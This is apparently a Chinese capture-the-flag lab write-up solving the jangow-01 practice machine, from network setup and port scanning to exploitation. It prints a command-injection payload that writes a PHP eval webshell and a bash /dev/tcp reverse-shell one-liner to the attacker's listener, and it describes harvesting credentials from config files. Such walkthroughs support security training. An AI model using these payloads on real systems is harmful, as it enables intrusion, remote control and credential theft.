jangow-01-1.0.1靶机复现

导入靶机

将我们下载好的jangow-01-1.0.1靶机导入vmware中

修改靶机网卡

这个靶机本来是在virtualbox上运行的,不修改配置的话,在vmware中仍然可以启动,但是用kali会扫描不到ip地址,原因是网卡不一样,我既安装了virtualBOX,又安装了vmware ,两个虚拟机管理工具可能会发生冲突,所以我们先来修改下靶机的网卡配置,确保我们不会发生错误。

调整靶机的网络模式

把靶机的网络模式调成和攻击机kali一样的网络模式,即NAT模式

修改网卡操作

在系统启动时显示以下界面 ,我们选第二个

继续选择第二个,按回车

会出现如下界面,按e进入编辑模式,进入以下界面

删除"recovery nmodeset"并在末尾添加"quiet splash rw init=/bin/bash"

修改后F10启动

编辑文件sudo vim /etc/network/interfaces 将网卡信息设置为ens33,重启靶机即可生效

扫描靶机ip

arp-scan -l

扫描到靶机ip为192.168.2.148

扫描端口

nmap -sS -A -O -sV -P- 192.168.2.148

发现靶机开放了21端口(ftp默认端口),80端口(http默认端口,http端口是直接可以访问到的)

访问192.168.2.148:80,发现是目录索引

进入site,发现是网站主页,没有发现有用的东西

执行目录扫描dirb http://192.168.2.148,也没有发现有用的东西,可以回到首页,点击其他项目

点到Buscar时发现地址栏变化,存在参数,尝试传参,发现没有对参数进行限制

尝试传入一句话木马

http://192.168.2.148/site/busque.php?buscar=echo '<?php eval($_POST["cmd"]);' > shell.php

使用蚁剑连接

进入目录查看文件系统

在wordpress中找到了config.php文件,里面发现了账户密码等信息

接着又在html/.backup目录下发现了账户密码,此前扫描到靶机开放了21端口,尝试使用密码链接

发现是第二套密码,连接成功

反弹shell

在kali上开启监听 端口443,因为靶机只能用443端口

在靶机终端输入下面的命令

bash -c 'bash -i >& /dev/tcp/192.168.2.128/443 0>&1'

反弹成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值